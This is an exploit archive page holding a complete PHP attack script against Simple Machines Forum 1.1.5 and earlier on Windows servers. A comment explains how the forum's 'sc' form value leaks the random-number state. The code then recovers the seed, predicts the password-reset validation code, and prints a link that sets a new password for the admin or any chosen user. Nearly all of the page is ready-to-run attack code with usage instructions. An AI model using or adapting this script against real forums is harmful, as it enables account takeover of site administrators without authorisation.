Home / exploits smf-reset.txt
Posted on 08 September 2008
<?php echo "--------------------------------------------------------------- "; echo "SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers) "; echo "(c)oded by Raz0r (http://Raz0r.name/) "; echo "--------------------------------------------------------------- "; if ($argc<3) { echo "USAGE: "; echo "~~~~~~ "; echo "php {$argv[0]} [host] [path] OPTIONS "; echo "[host] - target server where SMF is installed "; echo "[path] - path to SMF "; echo "OPTIONS: "; echo "--userid=[value] (default: 1) "; echo "--username=[value] (default: admin) "; echo "examples: "; echo "php {$argv[0]} site.com /forum/ "; echo "php {$argv[0]} site.com / --userid=2 --username=odmen "; die; } /** * Software site: http://www.simplemachines.org * * SMF leaks current state of random number generator through hidden input parameter `sc` * of the password reminder form: * * $_SESSION['rand_code'] = md5(session_id() . rand()); * $sc = $_SESSION['rand_code']; * * Since max random number generated with rand() on win32 is 32767 and session id * is known an attacker can reverse the md5 hash and get the random number value. * On win32 every random number generated with rand() is used as a seed for the next * random number. So if SMF is installed on win32 platform an attacker can predict * all the next random numbers. When password reset is requested SMF uses rand() * function to generate validation code: * * $password = substr(preg_replace('/W/', '', md5(rand())), 0, 10); * * So prediction of the validation code is possible and an atacker can set his * own password for any user. * * More information about random number prediction: * http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/ * * More information about the behaviour of rand() on win32 (in Russian): * http://raz0r.name/articles/magiya-sluchajnyx-chisel-chast-2/ */ set_time_limit(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",10); $host = $argv[1]; $path = $argv[2]; for($i=3;$i<=$argc;$i++){ if(isset($argv[$i]) && strpos($argv[$i],"--userid=")!==false) { list(,$userid) = explode("=",$argv[$i]); } if (isset($argv[$i]) && strpos($argv[$i],"--username=")!==false) { list(,$username) = explode("=",$argv[$i]); } } if(!isset($userid))$userid="1"; if(!isset($username))$username="admin"; $sess = md5(mt_rand()); echo "[~] Connecting to $host ... "; $ock = fsockopen($host,80); if($ock) echo "OK "; else die("failed "); $packet = "GET {$path}index.php?action=reminder HTTP/1.1 "; $packet.= "Host: {$host} "; $packet.= "Cookie: PHPSESSID=$sess; "; $packet.= "Keep-Alive: 300 "; $packet.= "Connection: keep-alive "; fputs($ock, $packet); while(!feof($ock)) { $resp = fgets($ock); preg_match('@name="sc" value="([0-9a-f]+)"@i',$resp,$out); if(isset($out[1])) { $md5 = $out[1]; break; } } if($md5) { $seed = getseed($md5); if($seed) { echo "[+] Seed for next random number is $seed "; } else die("[-] Can't calculate seed "); } else die("[-] Random number hash not found "); function getseed($md5) { global $sess; for($i=0;$i<=32767;$i++){ if($md5 == md5($sess . $i)) { return $i; } } } $sc = md5($sess . $seed); $data = "user=".urlencode($username)."&sc=$sc"; $packet = "POST {$path}index.php?action=reminder;sa=mail HTTP/1.1 "; $packet.= "Host: {$host} "; $packet.= "Cookie: PHPSESSID=$sess; "; $packet.= "Connection: close "; $packet.= "Content-Type: application/x-www-form-urlencoded "; $packet.= "Content-Length: ".strlen($data)." "; $packet.= $data; fputs($ock, $packet); $resp=''; while(!feof($ock)) { $resp .= fgets($ock); } if(preg_match("@HTTP/1.(0|1) 200 OK@i",$resp)===false) { die("[-] An error ocurred while requesting validation code "); } if(strpos($resp,"javascript:history.go(-1)")!==false) { die("[-] Invalid username "); } srand($seed); for($i=0;$i<6;$i++){ rand(); } $password = substr(preg_replace('/W/', '', md5(rand())), 0, 10); echo "[+] Success! To set password visit this link: http://{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password "; ?>
